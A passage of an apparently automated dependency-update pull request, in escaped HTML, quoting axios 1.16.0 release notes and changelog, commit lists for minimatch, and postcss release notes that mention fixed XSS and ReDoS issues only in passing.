href=\"https://redirect.github.com/axios/axios/issues/10813\"\u003e#10813\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10814\"\u003e#10814\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRelease:\u003c/strong\u003e Updated changelog and packages, and prepared the 1.16.0 release. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10790\"\u003e#10790\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10834\"\u003e#10834\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🌟 New Contributors\u003c/h2\u003e\n\u003cp\u003eWe are thrilled to welcome our new contributors. Thank you for helping improve axios:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/singhankit001\"\u003e\u003ccode\u003e@​singhankit001\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10588\"\u003e#10588\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/cuiweixie\"\u003e\u003ccode\u003e@​cuiweixie\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7419\"\u003e#7419\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/iruizsalinas\"\u003e\u003ccode\u003e@​iruizsalinas\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10787\"\u003e#10787\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/MarcosNocetti\"\u003e\u003ccode\u003e@​MarcosNocetti\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10680\"\u003e#10680\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/deepview-autofix\"\u003e\u003ccode\u003e@​deepview-autofix\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10729\"\u003e#10729\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/blob/v1.x/CHANGELOG.md\"\u003eaxios's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.16.0 — May 2, 2026\u003c/h2\u003e\n\u003cp\u003eThis release adds support for the QUERY HTTP method and a new \u003ccode\u003eECONNREFUSED\u003c/code\u003e error constant, lands a substantial wave of HTTP, fetch, and XHR adapter bug fixes around redirects, aborts, headers, and timeouts, and welcomes 23 new contributors.\u003c/p\u003e\n\u003ch2\u003e⚠️ Notable Changes\u003c/h2\u003e\n\u003cp\u003eA handful of fixes in this release are either security-adjacent or change observable behaviour. Please review before upgrading:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFetch adapter now enforces \u003ccode\u003emaxBodyLength\u003c/code\u003e and \u003ccode\u003emaxContentLength\u003c/code\u003e.\u003c/strong\u003e These limits were silently ignored on the fetch adapter prior to 1.16.0 — anyone relying on them as a safety net (DoS protection, accidental large uploads) had no protection. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10795\"\u003e#10795\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eProxy requests now preserve user-supplied \u003ccode\u003eHost\u003c/code\u003e headers.\u003c/strong\u003e Previously, the proxy path could overwrite a custom \u003ccode\u003eHost\u003c/code\u003e. Virtual-host-style routing through a proxy will now behave correctly. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10822\"\u003e#10822\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eBasic auth credentials embedded in URLs are now URL-decoded.\u003c/strong\u003e If you have percent-encoded credentials in a URL (e.g. \u003ccode\u003ehttps://user:p%40ss@host\u003c/code\u003e), the decoded value is what now goes on the wire. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10825\"\u003e#10825\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eparseProtocol\u003c/code\u003e now strictly requires a colon in the protocol separator.\u003c/strong\u003e Strings that loosely parsed as protocols before may no longer match. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10729\"\u003e#10729\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDeprecated \u003ccode\u003eunescape()\u003c/code\u003e replaced with modern UTF-8 encoding.\u003c/strong\u003e Non-ASCII URL handling is now spec-correct; consumers depending on legacy \u003ccode\u003eunescape()\u003c/code\u003e quirks may see different output bytes. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7378\"\u003e#7378\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003etransformRequest\u003c/code\u003e input typing change was reverted.\u003c/strong\u003e The typing change introduced in \u003ca href=\"https://redirect.github.com/axios/axios/issues/10745\"\u003e#10745\u003c/a\u003e was reverted in \u003ca href=\"https://redirect.github.com/axios/axios/issues/10810\"\u003e#10810\u003c/a\u003e after follow-up review — net behavior is unchanged from 1.15.2. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10745\"\u003e#10745\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10810\"\u003e#10810\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🚀 New Features\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eQUERY HTTP Method:\u003c/strong\u003e Added support for the QUERY HTTP method across adapters and type definitions. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10802\"\u003e#10802\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eECONNREFUSED Error Constant:\u003c/strong\u003e Exposed \u003ccode\u003eECONNREFUSED\u003c/code\u003e as a constant on \u003ccode\u003eAxiosError\u003c/code\u003e so callers can match connection-refused failures without comparing string literals (closes \u003ca href=\"https://redirect.github.com/axios/axios/issues/6485\"\u003e#6485\u003c/a\u003e). (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10680\"\u003e#10680\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eEncode Helper Export:\u003c/strong\u003e Exported the internal \u003ccode\u003eencode\u003c/code\u003e helper from \u003ccode\u003ebuildURL\u003c/code\u003e so userland param serializers can reuse the same encoding logic that axios uses internally. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/6897\"\u003e#6897\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🐛 Bug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eHTTP Adapter — Redirects \u0026amp; Headers:\u003c/strong\u003e Cleared stale headers when a redirect targets a no-proxy host, fixed the redirect listener chain so listeners no longer stack across hops, restored the missing \u003ccode\u003erequestDetails\u003c/code\u003e argument on \u003ccode\u003ebeforeRedirect\u003c/code\u003e, preserved user-supplied \u003ccode\u003eHost\u003c/code\u003e headers when forwarding through a proxy, and properly URL-decoded basic auth credentials. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10794\"\u003e#10794\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10800\"\u003e#10800\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/6241\"\u003e#6241\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10822\"\u003e#10822\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10825\"\u003e#10825\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHTTP Adapter — Streams \u0026amp; Timeouts:\u003c/strong\u003e Preserved the partial response object on \u003ccode\u003eAxiosError\u003c/code\u003e when a stream is aborted after headers arrive, honoured the \u003ccode\u003etimeout\u003c/code\u003e option during the connect phase when redirects are disabled, and resolved an unsettled-promise hang when an aborted request was combined with compression and \u003ccode\u003emaxRedirects: 0\u003c/code\u003e. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10708\"\u003e#10708\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10819\"\u003e#10819\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7149\"\u003e#7149\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eFetch Adapter:\u003c/strong\u003e Enforced \u003ccode\u003emaxBodyLength\u003c/code\u003e / \u003ccode\u003emaxContentLength\u003c/code\u003e in the fetch adapter, set the \u003ccode\u003eUser-Agent\u003c/code\u003e header to match the HTTP adapter, preserved the original abort reason instead of replacing it with a generic error, and deferred global access so importing the module no longer throws a \u003ccode\u003eTypeError\u003c/code\u003e in restricted environments. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10795\"\u003e#10795\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10772\"\u003e#10772\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10806\"\u003e#10806\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7260\"\u003e#7260\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eXHR Adapter:\u003c/strong\u003e Unsubscribed the \u003ccode\u003ecancelToken\u003c/code\u003e and \u003ccode\u003eAbortSignal\u003c/code\u003e listeners on the error, timeout, and abort code paths to prevent leaked subscriptions. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10787\"\u003e#10787\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eError Handling:\u003c/strong\u003e Attached the parsed response to \u003ccode\u003eAxiosError\u003c/code\u003e when \u003ccode\u003eJSON.parse\u003c/code\u003e fails inside \u003ccode\u003edispatchRequest\u003c/code\u003e, prevented \u003ccode\u003esettle\u003c/code\u003e from emitting \u003ccode\u003eundefined\u003c/code\u003e error codes, and tightened the \u003ccode\u003eparseProtocol\u003c/code\u003e regex to require a colon in the protocol separator. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10724\"\u003e#10724\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7276\"\u003e#7276\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10729\"\u003e#10729\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eTypes \u0026amp; Exports:\u003c/strong\u003e Aligned the CommonJS \u003ccode\u003eCancelToken\u003c/code\u003e typings with the ESM build, fixed a compiler error caused by \u003ccode\u003eRawAxiosHeaders\u003c/code\u003e, and re-exported \u003ccode\u003ecreate\u003c/code\u003e from the package index. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7414\"\u003e#7414\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/6389\"\u003e#6389\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/6460\"\u003e#6460\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eUTF-8 Encoding:\u003c/strong\u003e Replaced the deprecated \u003ccode\u003eunescape()\u003c/code\u003e call with a modern UTF-8 encoding implementation. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7378\"\u003e#7378\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMisc Cleanup:\u003c/strong\u003e Resolved a batch of small inconsistencies and gadget-level issues across the codebase. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10833\"\u003e#10833\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔧 Maintenance \u0026amp; Chores\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eRefactor — ES6 Modernisation:\u003c/strong\u003e Modernised the \u003ccode\u003eutils\u003c/code\u003e module and XHR adapter to use ES6 features, and tidied the multipart boundary error message. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10588\"\u003e#10588\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7419\"\u003e#7419\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eTests:\u003c/strong\u003e Hardened the HTTP test server lifecycle to fix flaky \u003ccode\u003eFormData\u003c/code\u003e EPIPE failures, fixed Win32 platform support for the pipe tests, and corrected an incorrect test assumption. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10820\"\u003e#10820\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10791\"\u003e#10791\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10796\"\u003e#10796\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDocs:\u003c/strong\u003e Documented \u003ccode\u003eparamsSerializer.encode\u003c/code\u003e for strict RFC 3986 query encoding, updated the \u003ccode\u003eparseReviver\u003c/code\u003e TypeScript definitions and configuration docs for ES2023, added timeout guidance to the README's first async example, and expanded notes around the recent type changes. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10821\"\u003e#10821\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10782\"\u003e#10782\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10759\"\u003e#10759\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10804\"\u003e#10804\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eReverted:\u003c/strong\u003e Reverted the \u003ccode\u003etransformRequest\u003c/code\u003e input typing change from \u003ca href=\"https://redirect.github.com/axios/axios/issues/10745\"\u003e#10745\u003c/a\u003e after follow-up review. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10745\"\u003e#10745\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10810\"\u003e#10810\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDependencies:\u003c/strong\u003e Bumped \u003ccode\u003eactions/setup-node\u003c/code\u003e, the \u003ccode\u003egithub-actions\u003c/code\u003e group, and \u003ccode\u003epostcss\u003c/code\u003e (in \u003ccode\u003e/docs\u003c/code\u003e) to their latest versions. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10785\"\u003e#10785\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10813\"\u003e#10813\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10814\"\u003e#10814\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRelease:\u003c/strong\u003e Updated changelog and packages, and prepared the 1.16.0 release. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10790\"\u003e#10790\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10834\"\u003e#10834\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🌟 New Contributors\u003c/h2\u003e\n\u003cp\u003eWe are thrilled to welcome our new contributors. Thank you for helping improve axios:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/singhankit001\"\u003e\u003ccode\u003e@​singhankit001\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10588\"\u003e#10588\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/cuiweixie\"\u003e\u003ccode\u003e@​cuiweixie\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7419\"\u003e#7419\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/iruizsalinas\"\u003e\u003ccode\u003e@​iruizsalinas\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10787\"\u003e#10787\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/MarcosNocetti\"\u003e\u003ccode\u003e@​MarcosNocetti\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10680\"\u003e#10680\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/deepview-autofix\"\u003e\u003ccode\u003e@​deepview-autofix\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10729\"\u003e#10729\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/df53d7dd99b202fb194217abd127ae6a630e70dc\"\u003e\u003ccode\u003edf53d7d\u003c/code\u003e\u003c/a\u003e chore(release): prepare release 1.16.0 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10834\"\u003e#10834\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/9d92bcd32639d1eea5b89f03ae45f248d3bb058e\"\u003e\u003ccode\u003e9d92bcd\u003c/code\u003e\u003c/a\u003e fix: gadgets and smaller issues (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10833\"\u003e#10833\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/5107ee69aee527b19eabaf80000ca65752135435\"\u003e\u003ccode\u003e5107ee6\u003c/code\u003e\u003c/a\u003e fix: prevent undefined error codes in settle (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7276\"\u003e#7276\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/e57349992f230b6b13e80613eb84302560aa5ba8\"\u003e\u003ccode\u003ee573499\u003c/code\u003e\u003c/a\u003e fix(fetch): defer global access in fetch adapter (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7260\"\u003e#7260\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/ad68e1a484b50086af427f767bbd7d6e3aab7ac3\"\u003e\u003ccode\u003ead68e1a\u003c/code\u003e\u003c/a\u003e fix(http): honor timeout during connect without redirects (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10819\"\u003e#10819\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/2a51828213128691d2e37502b5eb2cf4965a737d\"\u003e\u003ccode\u003e2a51828\u003c/code\u003e\u003c/a\u003e fix(http): decode URL basic auth credentials (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10825\"\u003e#10825\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/0e8b6bbb542131bae9940618d84d5286255d4db1\"\u003e\u003ccode\u003e0e8b6bb\u003c/code\u003e\u003c/a\u003e fix(http): preserve user-supplied Host header when forwarding through a proxy...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/79f39e1d041dca87173226d0255f90eaf252564b\"\u003e\u003ccode\u003e79f39e1\u003c/code\u003e\u003c/a\u003e docs: document paramsSerializer.encode for strict RFC 3986 query encoding (\u003ca href=\"https://redirect.github.com/axios/axios/issues/1\"\u003e#1\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/0fe3a5fc14829535e1d517c662d448e86c33438e\"\u003e\u003ccode\u003e0fe3a5f\u003c/code\u003e\u003c/a\u003e [Docs/Types] Update \u003ccode\u003eparseReviver\u003c/code\u003e TypeScript definitions for ES2023 and add ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/cd6737fd84bdb7caf2a319d3579573a49f9d238d\"\u003e\u003ccode\u003ecd6737f\u003c/code\u003e\u003c/a\u003e chore: matches the sibling responseStream.on(aborted) handler and added tests...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/axios/axios/compare/v1.15.0...v1.16.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `minimatch` from 3.0.3 to 10.2.5\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/7bba97888a27a6162983056bcce2a6e28f668712\"\u003e\u003ccode\u003e7bba978\u003c/code\u003e\u003c/a\u003e 3.1.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/bd259425b2ca17b42897997f93e890314155522d\"\u003e\u003ccode\u003ebd25942\u003c/code\u003e\u003c/a\u003e docs: add warning about ReDoS\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/1a9c27c75725474dbde57db2995b6281b267756d\"\u003e\u003ccode\u003e1a9c27c\u003c/code\u003e\u003c/a\u003e fix partial matching of globstar patterns\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/1a2e084af579731af66c221214e3ca8222c9bf23\"\u003e\u003ccode\u003e1a2e084\u003c/code\u003e\u003c/a\u003e 3.1.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/ae24656237c3d58067442f790ce17eff84463a47\"\u003e\u003ccode\u003eae24656\u003c/code\u003e\u003c/a\u003e update lockfile\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/b1003749228b2a79e1f237963a0d559ef7a0941e\"\u003e\u003ccode\u003eb100374\u003c/code\u003e\u003c/a\u003e limit recursion for **, improve perf considerably\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/26ffeaa091b9f660833e23f42e07165b33e85c13\"\u003e\u003ccode\u003e26ffeaa\u003c/code\u003e\u003c/a\u003e lockfile update\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/9eca892a4e5dbb20534f9f30483b85cdeee6c2eb\"\u003e\u003ccode\u003e9eca892\u003c/code\u003e\u003c/a\u003e lock node version to 14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/00c323b188b704e5d4bc534ecec2268cfa70a32a\"\u003e\u003ccode\u003e00c323b\u003c/code\u003e\u003c/a\u003e 3.1.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/30486b2048929264f44d18822891cfffa02af78b\"\u003e\u003ccode\u003e30486b2\u003c/code\u003e\u003c/a\u003e update CI matrix and actions\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/isaacs/minimatch/compare/v3.0.4...v3.1.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `postcss` from 8.4.31 to 8.5.10\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/postcss/postcss/releases\"\u003epostcss's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.5.10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed XSS via unescaped \u003ccode\u003e\u0026lt;/style\u0026gt;\u003c/code\u003e in non-bundler cases (by \u003ca href=\"https://github.com/TharVid\"\u003e\u003ccode\u003e@​TharVid\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up source map encoding paring in case of the error.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.8\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eProcessor#version\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.7\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImproved source map annotation cleaning performance (by CodeAnt AI).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.6\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eContainerWithChildren\u003c/code\u003e type discriminating (by \u003ca href=\"https://github.com/Goodwine\"\u003e\u003ccode\u003e@​Goodwine\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.5\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003epackage.json\u003c/code\u003e→\u003ccode\u003eexports\u003c/code\u003e compatibility with some tools (by \u003ca href=\"https://github.com/JounQin\"\u003e\u003ccode\u003e@​JounQin\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed Parcel compatibility issue (by \u003ca href=\"https://github.com/git-sumitchaudhary\"\u003e\u003ccode\u003e@​git-sumitchaudhary\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded more details to \u003ccode\u003eUnknown word\u003c/code\u003e error (by \u003ca href=\"https://github.com/hiepxanh\"\u003e\u003ccode\u003e@​hiepxanh\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eFixed types (by \u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eFixed docs (by \u003ca 